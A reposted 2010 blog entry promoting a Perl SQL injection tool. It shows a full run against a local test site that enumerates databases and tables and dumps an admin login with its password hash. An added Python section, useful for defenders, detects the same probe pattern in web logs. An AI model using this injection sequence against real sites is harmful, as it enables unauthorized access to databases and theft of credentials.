• 2010-03-05

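    MySQL injection tool and a simple test (Perl) - [Source Code Resources]

    Copyright notice: when reposting, please cite the article's original source, the author information and this notice with a hyperlink
    http://shareanything.blogbus.com/logs/59933201.html

    Source: www.0x50sec.org

    MySQL Injection Tool and a Simple Test (Perl)

    The ORDER BY check is guessed by halving (binary search). You can freely choose which database to dump; the default is the current database.
    Dumping the databases uses group_concat(), so a single GET does the job. Because there are sometimes many tables, and so that all of them can be displayed, dumping table_name uses limit x,1, where one get() can read only one record; you can't have it both ways. Basically, this little program injects the same way a person would by hand.
    A simple test result follows: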

     

    alone@alone-desktop:~/perl$ ./sql51.pl 'http://127.1/vnews.php?print=1&id=2' 'good'

    |=—————————————–=|
    |=———[ SQL Injector V1.0 ]———–=|
    |=———–[ By hackerxwar ]————-=|
    |=—————————————–=|

    [*] Test and 1=1
    [*] Test and 1=2

    [+] Vulnerable!!!

    [*] Test Mysql Version = 4.x

    [-] Mysql Version Is Not 4.x

    [*] Test Mysql Version = 5.x

    [+] Mysql Version is 5.x

    [*] Test Order By Query…

    [*] Test order by 25–
    [*] Test order by 13–
    [*] Test order by 7–
    [*] Test order by 4–
    [*] Test order by 5–
    [*] Test order by 6–

    [+] Found Order By 6
    [*] Getting Basic Info…

    [+] Data User: root@localhost
    [+] Database : sqlin

    [*] Check file_priv…

    [+] file_priv :Y

    [*] mysql5 will dump dbs…
    [*] Dumping databases …

    [+] Dump dbs :
    information_schema
    mysql
    sqlin

    Enter the database to dump:
    Default is The current database [sqlin]

    [*] Dumping table_name from database [sqlin]…
    Ext_JCCHP_Company
    Ext_JCCMS_Attachments
    Ext_JCCMS_Category
    Ext_JCCMS_Item
    Ext_JCRack_Product
    Ext_JCStaticPage
    Ext_JCUser
    Ext_JCUser_Purview
    Ext_JCUser_PurviewLink
    Ext_JCVisitorsBook_Words
    W3B_ServiceDonames
    W3B_Services
    admin
    uni_addons
    uni_articles
    uni_comments
    uni_custom_pages
    uni_files
    uni_files_ctg
    uni_gallery
    uni_gallery_ctg
    uni_menu
    uni_menu_ctg
    uni_news
    uni_patterns
    uni_patterns_ctg
    uni_rmenu
    uni_settings
    uni_styles
    uni_users
    Enter the table to dump: uni_users
    [*] Dumping column_name from table [sqlin.uni_users]…

    [+] Dump column_name from table [uni_users]:
    id
    login
    email
    password
    access

    [*] Dump the conten from table [uni_users]…
    Enter the username field: login
    Enter the password field: password

    [+] Dump [login]:[password] from table [uni_users]:
    admin:21232f297a57a5a743894a0e4a801fc3

    [+] Done…

    [+] Enjoy Hacking…
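
From the defender's side, the request order in the run above (the `and 1=1` / `and 1=2` pair, then ORDER BY probes 25, 13, 7, 4, 5, 6) is a recognizable pattern in web access logs. The following is an added example, not part of the original post or of the tool; the log tuples, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed (client, request target) pairs; the probing client replays the
# request order shown in the tool output above. Addresses are documentation IPs.
BASE = "/vnews.php?print=1&id=2"
SAMPLE_LOG = [("192.0.2.10", BASE), ("192.0.2.20", "/list.php?sort=order%20by%20date")]
SAMPLE_LOG += [("198.51.100.7", BASE + "%20and%201=" + n) for n in ("1", "2")]
SAMPLE_LOG += [("198.51.100.7", BASE + f"%20order%20by%20{n}--") for n in (25, 13, 7, 4, 5, 6)]

BOOL_PROBE = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)", re.I)
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)

def classify_order_by(values):
    """Return 'bisect', 'scan' or None for one client's ORDER BY <n> probes."""
    if len(set(values)) < 3:          # one or two numeric sorts: not enough signal
        return None
    steps = [abs(b - a) for a, b in zip(values, values[1:])]
    shrinking = all(s2 <= s1 for s1, s2 in zip(steps, steps[1:]))
    # Halving search: step sizes only shrink (12, 6, 3, 1, 1 for the run above).
    return "bisect" if shrinking and steps[0] > steps[-1] else "scan"

def analyze(log):
    """Map each suspicious client to the probe patterns seen in its requests."""
    bools, orders = defaultdict(set), defaultdict(list)
    for client, target in log:
        query = unquote_plus(target.partition("?")[2])   # decode %20 and '+'
        for a, b in BOOL_PROBE.findall(query):
            bools[client].add(int(a) == int(b))          # true vs. false condition
        orders[client] += [int(n) for n in ORDER_BY.findall(query)]
    findings = {}
    for client in sorted(set(bools) | set(orders)):
        hits = []
        if bools[client] == {True, False}:               # both halves of the pair
            hits.append("boolean-pair")
        kind = classify_order_by(orders[client])
        if kind:
            hits.append("order-by-" + kind)
        if hits:
            findings[client] = hits
    return findings

if __name__ == "__main__":
    for client, hits in analyze(SAMPLE_LOG).items():
        print(client, ", ".join(hits))
```

The numeric `sort=order by date` request and the plain `id=2` request are left unflagged, which is the point of requiring several distinct numeric ORDER BY values from one client.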

    Download: xmysql-v1.pl.tar

